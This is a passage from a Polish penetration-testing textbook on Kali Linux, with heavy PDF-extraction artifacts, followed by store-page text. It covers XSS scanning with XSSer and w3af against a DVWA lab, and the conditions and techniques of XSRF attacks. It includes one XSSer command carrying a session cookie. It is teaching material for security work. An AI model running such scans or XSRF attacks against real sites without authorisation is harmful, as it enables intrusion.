http://192.168.1.72/dvwa/vulnerabilities/ -g xss_r/?name= --cookie= security=low; PHPSESSID=n78lph8ojlp0khpli1ms3s73h5 -s –v Ze wzgl(cid:218)du na u(cid:285)ycie opcji Verbose w wynikach pokazane s(cid:200) te(cid:285) ró(cid:285)ne domy(cid:258)lne opcje ustawione przez program XSSer. XSSer wstrzykuje parametr i próbuje si(cid:218) dowiedzie(cid:202), czy jest on podatny na atak XSS, jak wida(cid:202) na rysunku na nast(cid:218)pnej stronie. w3af Kolejnym ciekawym narz(cid:218)dziem w systemie Kali Linux jest (cid:258)rodowisko do przeprowadzania audytów i atakowania aplikacji sieciowych, którego skrótowa nazwa brzmi w3af. U(cid:285)y(cid:239)em s(cid:239)owa „(cid:258)rodowisko”, poniewa(cid:285) jest to niezwykle bogato wyposa(cid:285)ony program. Obs(cid:239)uguje si(cid:218) go za po- moc(cid:200) menu. Zawiera liczne bardzo przydatne i pozwalaj(cid:200)ce oszcz(cid:218)dzi(cid:202) czas funkcje, takie jak automatyczne uzupe(cid:239)nianie podobne do tego w Metasploicie, i mo(cid:285)e si(cid:218) pochwali(cid:202) wyj(cid:200)tkowo bogat(cid:200) baz(cid:200) wtyczek. Na szczególn(cid:200) uwag(cid:218) zas(cid:239)uguje funkcja tworzenia (cid:239)adunków do hakowania aplikacji sieciowych. Wykorzystywanie luk w aplikacjach sieciowych i uzyskiwanie dost(cid:218)pu do komputera docelowe- go przez wys(cid:239)anie w(cid:239)asnego (cid:239)adunku danych zawsze jest trudne, ale (cid:258)rodowisko w3af zawiera wtyczki, dzi(cid:218)ki którym ta faza staje si(cid:218) nieco mniej uci(cid:200)(cid:285)liwa, oraz umo(cid:285)liwiaj(cid:200)ce integracj(cid:218) z Metasploitem, dzi(cid:218)ki czemu mo(cid:285)na wys(cid:239)a(cid:202) (cid:239)adunek Metasploita do komputera docelowego i u(cid:285)y(cid:202) go w pó(cid:283)niejszej fazie eksploracji. 174 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Wtyczki Wtyczki w programie w3af s(cid:200) podzielone na kilka kategorii, z których najwa(cid:285)niejsze opisa(cid:239)em poni(cid:285)ej: (cid:81) Crawl (przegl(cid:200)danie stron) — wtyczki z tej kategorii s(cid:239)u(cid:285)(cid:200) do przegl(cid:200)dania zawarto(cid:258)ci stron i identyfikacji nowych adresów URL. Znajduj(cid:200) potencjalne punkty wstrzykiwania kodu, które mog(cid:200) by(cid:202) wykorzystane przez inne wtyczki. (cid:81) Audit (audyt) — jest to grupa wtyczek wykorzystuj(cid:200)cych punkty wstrzykiwania kodu wykryte przez wtyczki z kategorii Crawl i sprawdzaj(cid:200)cych ich podatno(cid:258)(cid:202) na ataki. (cid:81) Grep — te wtyczki s(cid:239)u(cid:285)(cid:200) do identyfikacji najprostszych zdobyczy, takich jak strony b(cid:239)(cid:218)dów, komentarze, nag(cid:239)ówki HTTP i ró(cid:285)ne usterki powoduj(cid:200)ce wyciek informacji. Dane s(cid:200) zdobywane przez analiz(cid:218) (cid:285)(cid:200)da(cid:241) i odpowiedzi. (cid:81) Infrastructure (infrastruktura) — s(cid:200) to wtyczki do badania serwera docelowego oraz identyfikowania systemu operacyjnego, wersji bazy danych i zdobywania informacji dotycz(cid:200)cych DNS. (cid:81) Output (wyniki) — wtyczki z tej kategorii definiuj(cid:200) format wyników. (cid:81) Auth (autoryzacja) — w aplikacjach wymagaj(cid:200)cych uwierzytelniania wtyczka ta dostarcza podane wcze(cid:258)niej nazw(cid:218) u(cid:285)ytkownika i has(cid:239)o, dzi(cid:218)ki czemu mo(cid:285)liwe jest automatyczne uwierzytelnianie w aplikacji. Narz(cid:218)dzie w3af znajduje si(cid:218) w sekcji Applications/Web Application Analysis. Ewentualnie mo(cid:285)na te(cid:285) uruchomi(cid:202) narz(cid:218)dzie wiersza polece(cid:241), wpisuj(cid:200)c w terminalu polecenie w3af_console. Po jego wykonaniu za pomoc(cid:200) polecenia help mo(cid:285)na wy(cid:258)wietli(cid:202) list(cid:218) dost(cid:218)pnych mo(cid:285)liwo(cid:258)ci: 175 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Aby wy(cid:258)wietli(cid:202) wszystkie kategorie wtyczek, nale(cid:285)y wykona(cid:202) polecenia plugins i help. Aby wy- (cid:258)wietli(cid:202) szczegó(cid:239)owe informacje o ró(cid:285)nych wtyczkach dost(cid:218)pnych w wybranej kategorii, nale(cid:285)y wpisa(cid:202) nazw(cid:218) kategorii, np. audit, jak wida(cid:202) na poni(cid:285)szym rysunku: Aby przygotowa(cid:202) wybran(cid:200) wtyczk(cid:218) do u(cid:285)ycia, nale(cid:285)y wpisa(cid:202) nazw(cid:218) kategorii i kilka pierwszych znaków nazwy tej wtyczki, a nast(cid:218)pnie nacisn(cid:200)(cid:202) klawisz Tab. Interfejs graficzny Sposób testowania luki XSS zademonstruj(cid:218) na przyk(cid:239)adzie z u(cid:285)yciem graficznego interfejsu u(cid:285)ytkownika programu w3af. Program ten ma kilka gotowych profili zawieraj(cid:200)cych wybór wtyczek zgrupowanych w jeden pakiet. Na przyk(cid:239)ad profil OWASP_TOP10 mo(cid:285)e wybra(cid:202) kto(cid:258), kto chce przetestowa(cid:202) adres URL pod k(cid:200)tem dziesi(cid:218)ciu najcz(cid:218)(cid:258)ciej spotykanych luk bezpiecze(cid:241)stwa aplikacji sieciowych wed(cid:239)ug organizacji OWASP: 176 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Aby sprawdzi(cid:202) wybrany adres URL pod k(cid:200)tem luk XSS, nale(cid:285)y wybra(cid:202) wtyczk(cid:218) XSS z kategorii audytowej. Je(cid:285)eli test ma dotyczy(cid:202) luki XSS z utrwaleniem, u do(cid:239)u ekranu nale(cid:285)y wybra(cid:202) opcj(cid:218) persistent_xss. Nast(cid:218)pnie wystarczy poda(cid:202) docelowy URL i klikn(cid:200)(cid:202) przycisk Start (zobacz pierwszy rysunek na nast(cid:218)pnej stronie). W oknie Log zostanie wy(cid:258)wietlona informacja o wykrytej luce XSS wraz z identyfikatorem (cid:285)(cid:200)dania, który mo(cid:285)na powi(cid:200)za(cid:202) z konkretnymi (cid:285)(cid:200)daniami wys(cid:239)anymi do aplikacji docelowej. W tym okienku wy(cid:258)wietlany jest te(cid:285) stan skanowania (zobacz drugi rysunek na nast(cid:218)pnej stronie). 177 Poleć książkęKup książkę Kali Linux. Testy penetracyjne Aby si(cid:218) dowiedzie(cid:202), która para (cid:285)(cid:200)danie-odpowied(cid:283) spowodowa(cid:239)a ujawnienie usterki, nale(cid:285)y przej(cid:258)(cid:202) do okna Results (wyniki), w którym znajduj(cid:200) si(cid:218) zarówno nag(cid:239)ówki, jak i tre(cid:258)(cid:202) obu tych elementów komunikacji. W poni(cid:285)szym przyk(cid:239)adzie podatny na ataki jest parametr page: Luki typu XSRF Luki typu XSRF (ang. cross-site request forgery) s(cid:200) cz(cid:218)sto mylnie uwa(cid:285)ane za luki podobne do XSS. Jednak w ataku XSS haker wykorzystuje zaufanie, jakim u(cid:285)ytkownik darzy wybran(cid:200) witryn(cid:218), i dzi(cid:218)ki temu sk(cid:239)ania go do wykonania swoich skryptów. Natomiast sednem ataków XSRF jest wykorzystanie zaufania, jakim witryna darzy przegl(cid:200)dark(cid:218) u(cid:285)ytkownika, w efekcie czego wykonuje wszelkie (cid:285)(cid:200)dania pochodz(cid:200)ce od uwierzytelnionej sesji bez weryfikacji, czy rzeczywi(cid:258)cie u(cid:285)ytkow- nik chcia(cid:239) dan(cid:200) czynno(cid:258)(cid:202) wykona(cid:202). W ataku XSRF napastnik wykorzystuje fakt, (cid:285)e u(cid:285)ytkownik jest ju(cid:285) uwierzytelniony w aplikacji, dzi(cid:218)ki czemu wszystko, co klient wy(cid:258)le do serwera, zostanie potraktowane jako legalna dzia(cid:239)alno(cid:258)(cid:202). Je(cid:258)li nie zostan(cid:200) wdro(cid:285)one odpowiednie zabezpieczenia, w ataku XSRF mo(cid:285)e zosta(cid:202) wykorzystana ka(cid:285)da funkcja aplikacji sieciowej, która wymaga cho(cid:202)by jednego (cid:285)(cid:200)dania w ramach uwierzytel- nionej sesji. Oto kilka czynno(cid:258)ci, jakie napastnik mo(cid:285)e wykona(cid:202) w ramach ataku typu XSRF: (cid:81) zmiana danych u(cid:285)ytkownika w aplikacji sieciowej, np. adresu e-mail i daty urodzenia; (cid:81) wykonanie nielegalnych transakcji bankowych; (cid:81) nieuczciwe g(cid:239)osowanie na stronach internetowych; (cid:81) dodawanie pozycji do koszyka bez wiedzy w(cid:239)a(cid:258)ciciela w sklepie internetowym. 178 Poleć książkęKup książkę Rozdzia(cid:225) 6. • Luki umo(cid:298)liwiaj(cid:261)ce przeprowadzanie ataków XSS i XSRF Warunki powodzenia ataku Powodzenie wykorzystania luki XSRF zale(cid:285)y od kilku czynników: (cid:81) Poniewa(cid:285) atak XSRF polega na wykorzystaniu uwierzytelnionej sesji, ofiara musi utworzy(cid:202) aktywn(cid:200) uwierzytelnion(cid:200) sesj(cid:218) w aplikacji docelowej. Ponadto aplikacja ta musi zezwala(cid:202) na wykonywanie transakcji w sesji bez dodatkowego uwierzytelniania. (cid:81) XSRF to (cid:258)lepy atak, w ramach którego atakowana aplikacja sieciowa nie wysy(cid:239)a odpowiedzi do napastnika, tylko do ofiary. Napastnik musi zna(cid:202) parametry witryny mog(cid:200)ce wywo(cid:239)a(cid:202) okre(cid:258)lon(cid:200) akcj(cid:218). Je(cid:258)li np. haker chce zmieni(cid:202) zarejestrowany w witrynie adres e-mail ofiary, to musi znale(cid:283)(cid:202) parametr s(cid:239)u(cid:285)(cid:200)cy do dokonywania takich zmian. Zatem napastnik musi mie(cid:202) dobre rozeznanie w sposobie dzia(cid:239)ania aplikacji, które mo(cid:285)e zdoby(cid:202) przez bezpo(cid:258)redni kontakt. (cid:81) Je(cid:258)li aplikacja wykorzystuje metod(cid:218) POST, napastnik musi znale(cid:283)(cid:202) sposób na nak(cid:239)onienie u(cid:285)ytkownika do klikni(cid:218)cia spreparowanego adresu URL lub wej(cid:258)cia na specjalnie przygotowan(cid:200) stron(cid:218). Cel ten mo(cid:285)na osi(cid:200)gn(cid:200)(cid:202) za pomoc(cid:200) in(cid:285)ynierii spo(cid:239)ecznej. Technika ataku Z trzeciego punktu w poprzedniej sekcji wynika, (cid:285)e ofiara musi bezwiednie za pomoc(cid:200) swojej przegl(cid:200)darki wys(cid:239)a(cid:202) (cid:285)(cid:200)danie do aplikacji docelowej. Mo(cid:285)na to osi(cid:200)gn(cid:200)(cid:202) na kilka sposobów: (cid:81) Jedn(cid:200) z najcz(cid:218)(cid:258)ciej stosowanych technik, któr(cid:200) te(cid:285) powszechnie wykorzystuje si(cid:218) w demonstracjach ataków XSRF, jest u(cid:285)ywanie znacznika obrazu. Metoda ta polega na zmuszeniu podst(cid:218)pem ofiary do wej(cid:258)cia na specjaln(cid:200) stron(cid:218), na której (cid:239)adowany jest ma(cid:239
Pobierz darmowy fragment (pdf)

Gdzie kupić całą publikację:

Kali Linux. Testy penetracyjne. Wydanie II
Autor:

Opinie na temat publikacji:


Inne popularne pozycje z tej kategorii:


Czytaj również:


Prowadzisz stronę lub blog? Wstaw link do fragmentu tej książki i współpracuj z Cyfroteką: